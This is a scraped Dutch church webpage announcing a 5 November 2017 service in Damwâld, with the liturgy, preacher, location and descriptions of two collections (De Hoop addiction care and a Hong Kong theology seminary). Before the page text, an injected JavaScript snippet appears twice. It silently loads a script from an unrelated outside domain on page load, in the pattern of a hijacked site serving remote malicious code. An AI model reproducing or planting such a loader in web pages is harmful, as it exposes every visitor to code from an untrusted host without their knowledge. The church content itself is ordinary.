;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 5 november 2017 9:30 uur - PKN Damwâld
zondag 5 november 2017
09:30 uur
Koffie na de dienst in 't Skûlplak

Kerkdienst zondag 5 november 2017 9:30 uur

Thema: Voorbereiding Heilig Avondmaal

Informatie

Voorganger:Ds. J. Bakker, Feanwâlden
Organist:Foeke Wiegersma
Thema:Voorbereiding Heilig Avondmaal
Mededeling:Koffie na de dienst in 't Skûlplak
Liturgie
Lied voor de dienst Gezang 281
Welkom en mededelingen
We zingen: Psalm 119: 1 en 2
stilgebed, bemoediging en groet
gebed om ontferming
We zingen: Gezang 289: 1, 4 en 5
gebed van de zondag
We lezen: Spreuken 9, 1-6
We zingen: Gezang 326: 1 en 2
We lezen: Mattheüs 25, 1-13
We zingen: Gezang 326: 5
preek .
We zingen: Gezang 63
lezen: tekst voorbereiding heilig avondmaal
gebeden, stil gebed en Onze Vader
Collecte
We zingen: Gezang 262
Zegen
Na de dienst is er koffiedrinken in het Skûlplak
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Vrienden van de Hoop

Stichting vrienden van de Hoop
In 1975 voelde een aantal christenen in Dordrecht zich erg betrokken bij het lot van verslaafden in hun samenleving. Gesteund door de plaatselijke kerken besloten zij een opvang voor deze kwetsbare doelgroep op te zetten. Een opvang genaamd: De Hoop. Inmiddels, veertig jaar later, is de opvang uitgegroeid tot een centrum waar op verschillende manieren geestelijke zorg wordt geboden. Een plek waar verslaafden en mensen met psychische problemen professionele hulp krijgen om te herstellen en hun leven weer opnieuw op te bouwen. Alle medewerkers bij De Hoop werken vanuit hun christelijke visie. Het geloof dat in Gods ogen ieder mens waardevol is en dat er voor iedereen genezing en herstel mogelijk is. Bijna 40 jaar na het begin van De Hoop is de steun en het gebed van kerken en vrienden nog even hard nodig. Uw steun, bemoediging en vriendschap zijn dus van harte welkom! De giften worden besteed aan de invulling van identiteit en pastoraat in de behandelingen, de werkervaringbedrijven, het inloophuis, de opvang van moeders met hun kinderen, de christelijke evenementen, de meer dan honderd voorlichtingen en levensverhalen die gedeeld worden via onder andere het blad HOOP en het programma Verhalen van Hoop.

Tweede collecte: Kerk
Uitganscollecte: Theologie doceren in Hongkong

Najaarszendingscollecte: Theologie doceren in Hong Kong
Aan het Luthers Theologisch Seminarie in Hong Kong in China volgen ruim 560 studenten een opleiding tot theologiedocent of predikant. Ook rust het seminarie leken toe. Tjeerd de Boer is samen met zijn vrouw Kathleen Ferrier door Kerk in Actie uitgezonden naar Hong Kong om les te geven aan het seminarie. De studenten komen uit Hong Kong, China en uit andere Aziatische landen zoals Cambodja, Myanmar, Laos en Indonesië. Veel studenten zijn al gemeentepredikant of theologiedocent en willen hun kennis vergroten. Door in Hong Kong te studeren, blijft de opleiding betaalbaar en hoeven studenten niet naar het westen. Met deze collecte steunt u het werk van het Luthers Theologisch Seminarie en andere zendingspartners van Kerk in Actie. Van harte aanbevolen!